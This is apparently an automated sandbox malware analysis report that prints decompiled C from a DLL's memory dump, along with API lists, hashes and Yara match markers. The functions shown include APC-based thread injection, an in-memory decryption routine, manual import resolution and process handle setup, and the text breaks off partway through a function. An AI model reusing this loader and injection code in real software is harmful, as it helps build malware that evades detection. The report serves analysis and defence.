                                                                Similarity
                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                • String ID:
                                                                • API String ID: 2110400756-0
                                                                • Opcode ID: a381869359a9508cb33ae637dc0739d9aafe6e8a786b58040b2bee40ed73f70b
                                                                • Instruction ID: 29134dd7f3199aa2df81569bc46c6dd4be899e0037607ac4421cb920fb4b24cd
                                                                • Opcode Fuzzy Hash: a381869359a9508cb33ae637dc0739d9aafe6e8a786b58040b2bee40ed73f70b
                                                                • Instruction Fuzzy Hash: F721A5B1501225AFF701DF69CCD8ACA7BE8F7553E07128135F605E3168DB309E808B64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 10001FB2, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E10001FB2(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                0x10001fc9
                                                                0x10001fcf
                                                                0x10001fd3
                                                                0x10001fde
                                                                0x10001fe6
                                                                0x10001fef
                                                                0x10001ff3
                                                                0x10001ffa
                                                                0x10002001
                                                                0x10002003
                                                                0x10002009
                                                                0x10001fe6
                                                                0x1000200d

                                                                APIs
                                                                • CreateThread.KERNEL32 ref: 10001FC9
                                                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                                                • GetLastError.KERNEL32(00000000), ref: 10001FE9
                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                                                • CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                                                • SetLastError.KERNEL32(00000000), ref: 10002003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                • String ID:
                                                                • API String ID: 3832013932-0
                                                                • Opcode ID: c1965fa1aae3c231c6185313c3a25682be54ce8a4eee52ae1245e51d466a3a5a
                                                                • Instruction ID: ce2c0407e613e175972c0e078a1766e58809613f973274f1339e8cc1b503390c
                                                                • Opcode Fuzzy Hash: c1965fa1aae3c231c6185313c3a25682be54ce8a4eee52ae1245e51d466a3a5a
                                                                • Instruction Fuzzy Hash: 75F0F832A06731BBF3235BA19CD8F5BBFADFB087D2F018504F60591168C72198108BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 10001B6F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E10001B6F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x10004130;
				_t46 = E10002016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x10004140;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x100051a7; // 0x100051a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E1000185E(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x10004140 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                                                0x10001b76
                                                                0x10001b86
                                                                0x10001b8b
                                                                0x10001b90
                                                                0x10001ba5
                                                                0x10001bac
                                                                0x10001bb1
                                                                0x10001bc2
                                                                0x10001bc5
                                                                0x10001bcb
                                                                0x10001bd0
                                                                0x10001c83
                                                                0x10001bd6
                                                                0x10001bd6
                                                                0x10001bdc
                                                                0x10001c4b
                                                                0x10001bde
                                                                0x10001bde
                                                                0x10001be1
                                                                0x10001be3
                                                                0x10001beb
                                                                0x10001bee
                                                                0x10001bf1
                                                                0x10001bf9
                                                                0x10001c04
                                                                0x10001c05
                                                                0x10001c06
                                                                0x10001c23
                                                                0x10001c31
                                                                0x10001c38
                                                                0x10001c3b
                                                                0x10001c3e
                                                                0x10001c46
                                                                0x00000000
                                                                0x00000000
                                                                0x10001bf6
                                                                0x10001bf6
                                                                0x10001c48
                                                                0x10001c55
                                                                0x10001c6a
                                                                0x10001c57
                                                                0x10001c60
                                                                0x10001c65
                                                                0x10001c7b
                                                                0x10001c7b
                                                                0x10001c8a
                                                                0x10001c90

                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,751463F0,00003000,00000004,00000030,00000000,751463F0,00000000,?,?,?,?,?,?,100015B5,00000000), ref: 10001BC5
                                                                • memcpy.NTDLL(?,100015B5,751463F0,?,?,?,?,?,?,100015B5,00000000,00000030,751463F0,00000000), ref: 10001C60
                                                                • VirtualFree.KERNELBASE(100015B5,00000000,00008000,?,?,?,?,?,?,100015B5,00000000), ref: 10001C7B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$AllocFreememcpy
                                                                • String ID: Sep 21 2021
                                                                • API String ID: 4010158826-1195158264
                                                                • Opcode ID: 1cf6a1cf18816b3f23088f12a22e2bb8198dc4b4d5f5cf741d8892bebb34b570
                                                                • Instruction ID: 952fea5554e6ea9c6b6d701a00e5359ec4800a23aeca9bf1122bd908d9cf0ac5
                                                                • Opcode Fuzzy Hash: 1cf6a1cf18816b3f23088f12a22e2bb8198dc4b4d5f5cf741d8892bebb34b570
                                                                • Instruction Fuzzy Hash: 75312175D40219EBEB01CF94CD81BDEB7B8FF08344F104169EA05BB245DB71AA45CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 10001CE7, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 87%
                                                                			E10001CE7(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E10001540(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                0x10001cf0
                                                                0x10001cf5
                                                                0x10001d03
                                                                0x10001d08
                                                                0x10001d08
                                                                0x10001d0e
                                                                0x10001d13
                                                                0x10001d17
                                                                0x10001d1b
                                                                0x10001d1b
                                                                0x10001d25
                                                                0x10001d2e

                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 10001CEA
                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001CF5
                                                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 10001D08
                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 10001D1B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                • String ID:
                                                                • API String ID: 1452675757-0
                                                                • Opcode ID: 7978bd262e6d19c09d6aa4656baac92db8beb5a3c6207d51bcb1c2b168639f40
                                                                • Instruction ID: e4b3be2930a2d30c1a8d1367e94e89244ea36a12442c579d3d569057e20ce27f
                                                                • Opcode Fuzzy Hash: 7978bd262e6d19c09d6aa4656baac92db8beb5a3c6207d51bcb1c2b168639f40
                                                                • Instruction Fuzzy Hash: 9BE092313076216BF2126B294CC4EAB679CEF913F17124226F621922E4DF548C0189A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1000169A, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E1000169A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x10004144;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E1000196B(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E100012DC( &_v32,  &_v16,  *0x10004140 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					if(E10001E13(_t39, _t11,  &_v32,  &_v36) == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x10004138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E10002070(_t44, _t32 + 4);
						}
					}
					_t25 = E100010F9(_v28); // executed
				}
				ExitThread(_t25);
			}














                                                                0x100016a0
                                                                0x100016b1
                                                                0x100016bb
                                                                0x100016b3
                                                                0x100016b3
                                                                0x100016b3
                                                                0x100016c2
                                                                0x100016cb
                                                                0x100016d0
                                                                0x100016ee
                                                                0x1000174a
                                                                0x100016f0
                                                                0x100016f6
                                                                0x100016fc
                                                                0x1000170a
                                                                0x10001715
                                                                0x1000171e
                                                                0x10001722
                                                                0x10001728
                                                                0x10001739
                                                                0x1000172a
                                                                0x10001730
                                                                0x10001730
                                                                0x10001728
                                                                0x10001741
                                                                0x10001741
                                                                0x1000174c

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitThreadlstrlen
                                                                • String ID:
                                                                • API String ID: 2636182767-0
                                                                • Opcode ID: b2274092c8445685ec2cd76520e0405317c363aced49d941c636058f159a5ac8
                                                                • Instruction ID: 0cf49a4b4e23d9d9ae1aa408ad671cdcffb1bf156085d6e57ed5d2e430731b0c
                                                                • Opcode Fuzzy Hash: b2274092c8445685ec2cd76520e0405317c363aced49d941c636058f159a5ac8
                                                                • Instruction Fuzzy Hash: 09116DB1508305ABF721DBA4CC99ECB77ECEB043C1F024926F555D3169EB30E6448B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1000196B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 37%
                                                                			E1000196B(void* __eax, intOrPtr _a4) {

				 *0x10004150 =  *0x10004150 & 0x00000000;
				_push(0);
				_push(0x1000414c);
				_push(1);
				_push(_a4);
				 *0x10004148 = 0xc; // executed
				L10002010(); // executed
				return __eax;
			}



                                                                0x1000196b
                                                                0x10001972
                                                                0x10001974
                                                                0x10001979
                                                                0x1000197b
                                                                0x1000197f
                                                                0x10001989
                                                                0x1000198e

                                                                APIs
                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(100016C7,00000001,1000414C,00000000), ref: 10001989
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DescriptorSecurity$ConvertString
                                                                • String ID:
                                                                • API String ID: 3907675253-0
                                                                • Opcode ID: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                                                • Instruction ID: 282e5bb9558e7c36415e3b38fee0fcfa39ed5af610658c9955217df824f70e77
                                                                • Opcode Fuzzy Hash: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                                                • Instruction Fuzzy Hash: EBC04CF8140750A7F620DB408C85FC57A51B7A4785F120504F650251E9CBB510D4951D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 10001E13, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E10001E13(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004144;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}













                                                                0x10001e13
                                                                0x10001e1c
                                                                0x10001e20
                                                                0x10001e26
                                                                0x10001e2b
                                                                0x10001e30
                                                                0x10001e33
                                                                0x10001e36
                                                                0x10001e3b
                                                                0x10001e3c
                                                                0x10001e3f
                                                                0x10001e4a
                                                                0x10001e51
                                                                0x10001e55
                                                                0x10001e57
                                                                0x10001e58
                                                                0x10001e5b
                                                                0x10001e60
                                                                0x10001e6a
                                                                0x10001e6c
                                                                0x10001e6c
                                                                0x10001e86
                                                                0x10001e8a
                                                                0x10001eda
                                                                0x10001e8c
                                                                0x10001e95
                                                                0x10001eab
                                                                0x10001eb3
                                                                0x10001ec5
                                                                0x10001ec9
                                                                0x00000000
                                                                0x00000000
                                                                0x10001eb5
                                                                0x10001eb8
                                                                0x10001ebd
                                                                0x10001ebf
                                                                0x10001ebf
                                                                0x10001ea0
                                                                0x10001ea2
                                                                0x10001ecb
                                                                0x10001ecc
                                                                0x10001ecc
                                                                0x10001e95
                                                                0x10001ee2

                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001713,0000000A,?,?), ref: 10001E20
                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001E36
                                                                • _snwprintf.NTDLL ref: 10001E5B
                                                                • CreateFileMappingW.KERNEL32(000000FF,10004148,00000004,00000000,?,?), ref: 10001E80
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001E97
                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 10001EAB
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001EC3
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A), ref: 10001ECC
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001ED4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                • String ID:
                                                                • API String ID: 1724014008-0
                                                                • Opcode ID: 6494f7ae6f62221055e60181491e3fe6bbbf159ec9462afcbb4831df1b3ad40a
                                                                • Instruction ID: 254ce7f55be2e700fe156080e3ad539a5a5a63b5fbf22f3b945be7b030c8b019
                                                                • Opcode Fuzzy Hash: 6494f7ae6f62221055e60181491e3fe6bbbf159ec9462afcbb4831df1b3ad40a
                                                                • Instruction Fuzzy Hash: A7217FB6A00158AFF711EFA4CC84EDF77ADEB483D1F218029FA15D7194DA7099418B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 10001EE5, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E10001EE5() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                0x10001ee6
                                                                0x10001ef4
                                                                0x10001efa
                                                                0x10001f01
                                                                0x10001f58
                                                                0x10001f58
                                                                0x10001f03
                                                                0x10001f0b
                                                                0x10001f18
                                                                0x10001f18
                                                                0x10001f54
                                                                0x10001f56
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x10001f0d
                                                                0x10001f14
                                                                0x10001f1a
                                                                0x10001f1a
                                                                0x10001f1f
                                                                0x10001f2d
                                                                0x10001f32
                                                                0x10001f38
                                                                0x10001f3e
                                                                0x10001f45
                                                                0x10001f47
                                                                0x10001f47
                                                                0x10001f51
                                                                0x10001f16
                                                                0x10001f16
                                                                0x00000000
                                                                0x10001f16
                                                                0x10001f14

                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                                                • GetVersion.KERNEL32 ref: 10001F03
                                                                • GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                • String ID:
                                                                • API String ID: 845504543-0
                                                                • Opcode ID: 30991713d34a36b48364b3d9eb425c50554a7358dc8637d6b5eee2527c28cd1a
                                                                • Instruction ID: ea10dc5c802a680a8ba8bb0f8edc734978800e41233c6741bbe9ab65d3b2f1fa
                                                                • Opcode Fuzzy Hash: 30991713d34a36b48364b3d9eb425c50554a7358dc8637d6b5eee2527c28cd1a
                                                                • Instruction Fuzzy Hash: 77F0C2B0641332DBF7019F68AD9A7D63BE4E7097D2F028125F641C61ECDBB084918B5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 10001753, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E10001753(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x10004140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                0x10001753
                                                                0x1000175c
                                                                0x10001761
                                                                0x10001767
                                                                0x10001770
                                                                0x10001776
                                                                0x10001778
                                                                0x1000177b
                                                                0x10001780
                                                                0x10001787
                                                                0x10001787
                                                                0x1000178b
                                                                0x10001791
                                                                0x10001796
                                                                0x00000000
                                                                0x00000000
                                                                0x1000179c
                                                                0x100017a6
                                                                0x100017a8
                                                                0x100017ab
                                                                0x100017ae
                                                                0x100017b2
                                                                0x100017ba
                                                                0x100017bc
                                                                0x100017bf
                                                                0x10001827
                                                                0x10001827
                                                                0x1000182b
                                                                0x00000000
                                                                0x00000000
                                                                0x100017c4
                                                                0x100017ca
                                                                0x100017cc
                                                                0x100017df
                                                                0x100017e2
                                                                0x100017e2
                                                                0x100017e2
                                                                0x100017e6
                                                                0x100017ce
                                                                0x100017ce
                                                                0x100017d6
                                                                0x100017d8
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x100017d8
                                                                0x100017c6
                                                                0x100017c6
                                                                0x100017da
                                                                0x100017da
                                                                0x100017da
                                                                0x100017e9
                                                                0x100017ec
                                                                0x100017ee
                                                                0x100017f5
                                                                0x100017f0
                                                                0x100017f0
                                                                0x100017f0
                                                                0x100017fd
                                                                0x10001803
                                                                0x10001805
                                                                0x10001835
                                                                0x10001807
                                                                0x10001807
                                                                0x1000180a
                                                                0x1000180c
                                                                0x10001814
                                                                0x10001814
                                                                0x10001819
                                                                0x1000181b
                                                                0x10001822
                                                                0x10001824
                                                                0x10001824
                                                                0x10001824
                                                                0x00000000
                                                                0x10001824
                                                                0x00000000
                                                                0x10001805
                                                                0x100017b4
                                                                0x100017b4
                                                                0x100017b8
                                                                0x00000000
                                                                0x00000000
                                                                0x100017b8
                                                                0x10001838
                                                                0x10001838
                                                                0x1000183f
                                                                0x10001844
                                                                0x00000000
                                                                0x00000000
                                                                0x1000184a
                                                                0x10001855
                                                                0x00000000
                                                                0x10001855
                                                                0x1000184c
                                                                0x1000184c
                                                                0x10001852
                                                                0x00000000
                                                                0x10001852
                                                                0x10001780
                                                                0x10001856
                                                                0x1000185b

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 1000178B
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 100017FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID:
                                                                • API String ID: 2574300362-0
                                                                • Opcode ID: 719e1af3a538566be693e02a9281a347347f2200d9d76fa5ba7df30f4bf57b7f
                                                                • Instruction ID: 50a551485af94626e36314b7bf6b70129b1ae1d3f994bda35dae46301a5f1ec2
                                                                • Opcode Fuzzy Hash: 719e1af3a538566be693e02a9281a347347f2200d9d76fa5ba7df30f4bf57b7f
                                                                • Instruction Fuzzy Hash: 28315E75A0520ADFEB54CF59C890AEEB7F9FF04390B21816DD905E7248EB70DA41CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F00576, Relevance: 2.9, Strings: 2, Instructions: 365COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c$t32c
                                                                • API String ID: 0-1046649395
                                                                • Opcode ID: 7ee3f6eae238e576769600233bef0f3bd2ce6700d5470fa46275222c547d7dac
                                                                • Instruction ID: 2dc1e10a3529a19a928a27013d7279e76f09d6c63ad8514d11b52adaab1d4663
                                                                • Opcode Fuzzy Hash: 7ee3f6eae238e576769600233bef0f3bd2ce6700d5470fa46275222c547d7dac
                                                                • Instruction Fuzzy Hash: 30E13832A0011AEFDF24CB54CD84BAAB7B5FF88324F1881D5D509A7251DB31AE95EF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 100023D5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E100023D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
